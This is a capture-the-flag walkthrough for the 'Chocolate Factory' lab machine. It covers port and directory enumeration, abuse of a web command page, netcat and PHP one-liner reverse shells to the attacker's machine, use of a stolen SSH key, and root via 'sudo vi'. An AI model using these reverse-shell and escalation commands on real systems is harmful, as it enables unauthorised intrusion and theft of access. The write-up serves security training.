Welcome and let’s get started!
And the first thing is… enumerate!
Let’s run nmap:
nmap -p- <target-machine-ip>
Wow!! So many open ports!!
Let’s check what are they running and pull up nmap again. This time I’ll save the output to a file.
nmap -p 21,22,80,100–125 -T4 -A -oA chocolate-nmap <target-machine-ip>
Opening the report on our text editor, we can see a lot of… ASCII?
And this goes on until the end… except for port 113:
Well, there is some key somewhere on the web server. Let us take note of this and check de website.
Open the browser and enter the machine IP address:
We are presented with a login page but we do not know the credentials. I guess brute-forcing this would be an option, but I usually save that as a last resort.
Let’s check the source code of the page.
A simple POST form that sends the data to a PHP file called validator.php.
Continuing with the discovery phase, let’s enumerate the web server directories and files using Gobuster:
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<target-machine-IP> -t 50 -x php,txt,htm,html,cfg -s 200,301,304
Nice! Gobuster shows us 3 files. Index.html and validate.php we already know, so let’s navigate to home.php.
I guess we can run commands from this page. Let’s try some.
www-data, as expected, I guess. Check the directory contents with ls.
It’s kind of hard to read, so let’s arrange this:
Remember what nmap found on port 113, referring some key_rev_key file? There it is! But, what kind of file is it?
It is a binary executable. We can, probably, get something out of it. Maybe later.
This interface is kinda rude, let’s try to get a shell and check if the system has netcat installed, running
Well, it has. Setup a listener on your box and launch a netcat reverse shell from the page.
nc -nvlp 65000
nc -n <your-machine-ip> -e /bin/bash
And nothing happens…
Since the web server runs PHP, it must have PHP installed…
Again, setup a listener on your box and launch the PHP one liner reverse shell from the page.
nc -nvlp 65000
/usr/bin/php -r ‘$sock=fsockopen(“<your-machine-ip>”,65000);exec(“/bin/sh -i <&3 >&3 2>&3”);’
And we got shell!!
Let’s make it more usable:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
CTRL + Z
stty raw -echo
Now we have pretty little shell…
Check the files in this directory.
We can read most of those files. We already know that key_rev_key is an executable file but we do not have permissions to run it.
Take a peek at validate.php.
And we have “charlie” password for the web application!
If we enter those credentials on the login page, we are taken to… home.php. And it is just the same as if we would get there directly.
OK, so let’s talk a walk through the filesystem.
ls -al /home
We can try to change user to charlie using the same password… but it does not work.
We have permissions to check charlie’s home directory, so why not?
ls -al /home/charlie
Well, we cannot read the user flag, but we can check those teleport files
Nice!! Public and private RSA keys that will allow us to ssh into the machine as charlie!
Copy the contents of the private key file, teleport, to a file on your machine. We can simply copy/paste from the previous cat command.
Then, on your machine, run the ssh client with the identity flag pointing to the file you just created.
ssh charlie@<target-machine-ip> -i teleport
And we are charlie! Let’s jump to charlie’s home dir, in /home/charlie and grab that user flag!
cd /home/charlie && cat user.txt
Now, we return to the web server public directory, located at /var/www/html and run key_rev_key.
Remember, this is a CTF. On a real pentesting job, DO NOT RUN UNKNOWN EXECUTABLES!
chmod +x key_rev_key
The program asks for a name that we do not have, but it might be hardcoded in it. Let’s run strings on it.
It gives us a bunch of strings. Let’s focus on those we are more familiar with.
Although “laksdhfas” is weird, let’s feed it to the program.
Well done! We got a key!
Now, for the root!!
Run sudo to check what charlie can or cannot do without password
sudo vi -c ‘:!/bin/bash’ /dev/null
Just grab that root flag, and we are done!
Thanks for reading this write-up. Hope you enjoyed this Chocolate Factory!